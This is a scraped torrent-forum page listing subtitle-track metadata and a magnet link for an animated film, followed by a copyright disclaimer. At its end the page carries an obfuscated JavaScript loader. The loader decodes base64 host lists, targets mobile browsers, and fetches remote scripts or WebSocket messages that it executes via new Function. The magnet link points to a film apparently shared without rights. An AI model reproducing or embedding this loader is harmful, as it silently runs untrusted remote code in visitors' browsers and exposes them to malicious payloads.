  841. Codec ID/Info : UTF-8 Plain Text

  842. Duration : 1 h 35 min

  843. Bit rate : 49 b/s

  844. Count of elements : 864

  845. Stream size : 34.6 KiB (0%)

  846. Title : Norwegian Bokmal

  847. Language : Norwegian Bokmal

  848. Default : No

  849. Forced : No


  850. Text #20

  851. ID : 49

  852. Format : UTF-8

  853. Codec ID : S_TEXT/UTF8

  854. Codec ID/Info : UTF-8 Plain Text

  855. Duration : 1 h 35 min

  856. Bit rate : 54 b/s

  857. Count of elements : 1096

  858. Stream size : 37.9 KiB (0%)

  859. Title : Polish

  860. Language : Polish

  861. Default : No

  862. Forced : No


  863. Text #21

  864. ID : 50

  865. Format : UTF-8

  866. Codec ID : S_TEXT/UTF8

  867. Codec ID/Info : UTF-8 Plain Text

  868. Duration : 1 h 35 min

  869. Bit rate : 54 b/s

  870. Count of elements : 1190

  871. Stream size : 38.2 KiB (0%)

  872. Title : Portuguese

  873. Language : Portuguese

  874. Default : No

  875. Forced : No


  876. Text #22

  877. ID : 51

  878. Format : UTF-8

  879. Codec ID : S_TEXT/UTF8

  880. Codec ID/Info : UTF-8 Plain Text

  881. Duration : 1 h 35 min

  882. Bit rate : 55 b/s

  883. Count of elements : 1176

  884. Stream size : 39.0 KiB (0%)

  885. Title : Brazilian Portuguese

  886. Language : Portuguese

  887. Default : No

  888. Forced : No


  889. Text #23

  890. ID : 52

  891. Format : UTF-8

  892. Codec ID : S_TEXT/UTF8

  893. Codec ID/Info : UTF-8 Plain Text

  894. Duration : 1 h 37 min

  895. Bit rate : 52 b/s

  896. Count of elements : 1408

  897. Stream size : 37.5 KiB (0%)

  898. Title : Romanian

  899. Language : Romanian

  900. Default : No

  901. Forced : No


  902. Text #24

  903. ID : 53

  904. Format : UTF-8

  905. Codec ID : S_TEXT/UTF8

  906. Codec ID/Info : UTF-8 Plain Text

  907. Duration : 1 h 35 min

  908. Bit rate : 81 b/s

  909. Count of elements : 1193

  910. Stream size : 56.8 KiB (0%)

  911. Title : Russian

  912. Language : Russian

  913. Default : No

  914. Forced : No


  915. Text #25

  916. ID : 54

  917. Format : UTF-8

  918. Codec ID : S_TEXT/UTF8

  919. Codec ID/Info : UTF-8 Plain Text

  920. Duration : 1 h 35 min

  921. Bit rate : 49 b/s

  922. Count of elements : 1128

  923. Stream size : 34.4 KiB (0%)

  924. Title : Spanish

  925. Language : Spanish

  926. Default : No

  927. Forced : No


  928. Text #26

  929. ID : 55

  930. Format : UTF-8

  931. Codec ID : S_TEXT/UTF8

  932. Codec ID/Info : UTF-8 Plain Text

  933. Duration : 1 h 35 min

  934. Bit rate : 53 b/s

  935. Count of elements : 1162

  936. Stream size : 37.2 KiB (0%)

  937. Title : European Spanish

  938. Language : Spanish

  939. Default : No

  940. Forced : No


  941. Text #27

  942. ID : 56

  943. Format : UTF-8

  944. Codec ID : S_TEXT/UTF8

  945. Codec ID/Info : UTF-8 Plain Text

  946. Duration : 1 h 35 min

  947. Bit rate : 49 b/s

  948. Count of elements : 1185

  949. Stream size : 34.4 KiB (0%)

  950. Title : Swedish

  951. Language : Swedish

  952. Default : No

  953. Forced : No


  954. Text #28

  955. ID : 57

  956. Format : UTF-8

  957. Codec ID : S_TEXT/UTF8

  958. Codec ID/Info : UTF-8 Plain Text

  959. Duration : 1 h 35 min

  960. Bit rate : 135 b/s

  961. Count of elements : 1324

  962. Stream size : 94.9 KiB (0%)

  963. Title : Thai

  964. Language : Thai

  965. Default : No

  966. Forced : No


  967. Text #29

  968. ID : 58

  969. Format : UTF-8

  970. Codec ID : S_TEXT/UTF8

  971. Codec ID/Info : UTF-8 Plain Text

  972. Duration : 1 h 35 min

  973. Bit rate : 46 b/s

  974. Count of elements : 1189

  975. Stream size : 32.7 KiB (0%)

  976. Title : Turkish

  977. Language : Turkish

  978. Default : No

  979. Forced : No


  980. Text #30

  981. ID : 59

  982. Format : UTF-8

  983. Codec ID : S_TEXT/UTF8

  984. Codec ID/Info : UTF-8 Plain Text

  985. Duration : 1 h 37 min

  986. Bit rate : 74 b/s

  987. Count of elements : 1425

  988. Stream size : 53.4 KiB (0%)

  989. Title : Ukrainian

  990. Language : Ukrainian

  991. Default : No

  992. Forced : No


  993. Text #31

  994. ID : 60

  995. Format : UTF-8

  996. Codec ID : S_TEXT/UTF8

  997. Codec ID/Info : UTF-8 Plain Text

  998. Duration : 1 h 35 min

  999. Bit rate : 84 b/s

  1000. Count of elements : 1314

  1001. Stream size : 59.1 KiB (0%)

  1002. Title : Vietnamese

  1003. Language : Vietnamese

  1004. Default : No

  1005. Forced : No




复制代码


TAGS 冒险 剧情 动画

磁力链:
  • magnet:?xt=urn:btih:356B413CD7875FE66338B1F95F6DE14BFC7CFFC9

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x54\x47\x50\x48\x42\x70\x79\x79\x5a\x53']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vanNrZGxmamtkLnhpbbnlhbbnNhYXMuY29tLGh0dHBzOi8vbb2pza2RramZrbbGQuaG9uZ3J1aWt0LmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};